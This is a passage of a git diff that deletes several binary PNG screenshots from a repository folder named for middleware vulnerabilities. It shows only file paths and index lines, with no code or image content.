index 44cb904..0000000
Binary files a/中间件漏洞/images/image-20230328155952101.png and /dev/null differ
diff --git a/中间件漏洞/images/image-20230328160010674.png b/中间件漏洞/images/image-20230328160010674.png
deleted file mode 100644
index 7ac725b..0000000
Binary files a/中间件漏洞/images/image-20230328160010674.png and /dev/null differ
diff --git a/中间件漏洞/images/image-20230328160034054.png b/中间件漏洞/images/image-20230328160034054.png
deleted file mode 100644
index f5a3416..0000000
Binary files a/中间件漏洞/images/image-20230328160034054.png and /dev/null differ
diff --git a/中间件漏洞/images/image-20230328160045518.png b/中间件漏洞/images/image-20230328160045518.png
deleted file mode 100644
index 8fd8a2f..0000000
Binary files a/中间件漏洞/images/image-20230328160045518.png and /dev/null differ